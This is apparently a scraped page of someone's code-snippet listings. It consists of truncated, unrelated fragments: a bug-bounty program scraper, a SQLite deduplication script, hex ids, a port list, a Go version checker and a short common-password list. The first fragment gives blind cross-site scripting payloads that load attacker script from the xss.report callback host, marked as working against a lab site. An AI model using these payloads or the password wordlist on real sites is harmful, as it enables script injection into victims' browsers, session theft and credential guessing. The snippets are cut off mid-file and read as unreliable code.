This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Tested on this lab: https://labs.krazeplanet.com/xss/1 | |
## xss.report: | |
<Script/Src=//xss.report/c/rix4uni></Script> | |
# not working | |
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import('//xss.report/c/rix4uni/.source'))//> | |
# working | |
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import('//xss.report/c/rix4uni'))//> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import argparse | |
from bs4 import BeautifulSoup | |
import requests | |
def scrape_firebounty(output_file): | |
# Get the total number of pages dynamically | |
initial_url = "https://firebounty.com/?page=1&sort=created_at&search_field=name&order=desc&search=" | |
initial_response = requests.get(initial_url) | |
initial_soup = BeautifulSoup(initial_response.content, "html.parser") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sqlite3 | |
import sys | |
# Connect to the SQLite database | |
conn = sqlite3.connect(sys.argv[1]) | |
# Create a cursor object | |
cursor = conn.cursor() | |
# Identify duplicate URLs |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1e92d115891886 | |
4a3b83cdd499b3 | |
1f60a92caca2ab | |
360b82d6f0c132 | |
e2ce9ded3318f7 | |
6a343fca263478 | |
3e29aa72dea857 | |
fdb606c07f0a9b | |
06f7623cc4e9af | |
4fae1ae07f66d6 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
11,13,15,17,19,20,21,22,23,24,25,26,37,38,49,51,53,67,68,70,79,80,81,82,83,84,85,86,87,88,89,90,91,92,95,96,97,98,99,100,102,104,106,110,111,119,121,123,131,135,139,143,154,161,162,175,179,180,195,199,211,221,222,225,263,264,280,300,311,340,389,427,443,444,445,447,448,449,450,465,491,502,503,522,541,546,547,548,555,583,591,593,631,636,646,666,675,685,771,772,777,789,800,801,805,806,808,830,832,843,873,880,888,902,943,981,990,992,993,994,995,999,1000,1010,1012,1022,1023,1024,1025,1026,1027,1028,1029,1050,1063,1080,1099,1110,1111,1119,1153,1167,1186,1200,1234,1250,1290,1311,1337,1344,1355,1366,1388,1400,1433,1434,1443,1471,1480,1494,1500,1521,1554,1588,1604,1650,1660,1723,1741,1801,1820,1830,1833,1883,1901,1919,1925,1926,1935,1947,1950,1951,1962,1981,1990,2000,2001,2002,2003,2006,2008,2010,2012,2018,2020,2021,2022,2030,2048,2049,2050,2051,2052,2053,2054,2055,2056,2057,2058,2059,2060,2061,2062,2063,2064,2065,2066,2067,2068,2069,2070,2077,2079,2080,2081,2082,2083,2086,2087,2095,2096,2100,2111,2121,2122,2126,2150, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo -e "Checking Golang latest version" | |
go_latest_version=$(curl -L -s https://golang.org/VERSION?m=text | grep -o 'go[0-9]*\.[0-9]*\.[0-9]*') | |
go_system_version=$(go version 2> /dev/null | awk {'print $3'}) | |
if [[ -z "$go_system_version" ]]; then | |
go_system_version="Not Found" | |
fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
12345678 | |
123456789 | |
88888888 | |
11111111 | |
55555555 | |
00000000 | |
Airtel@123 |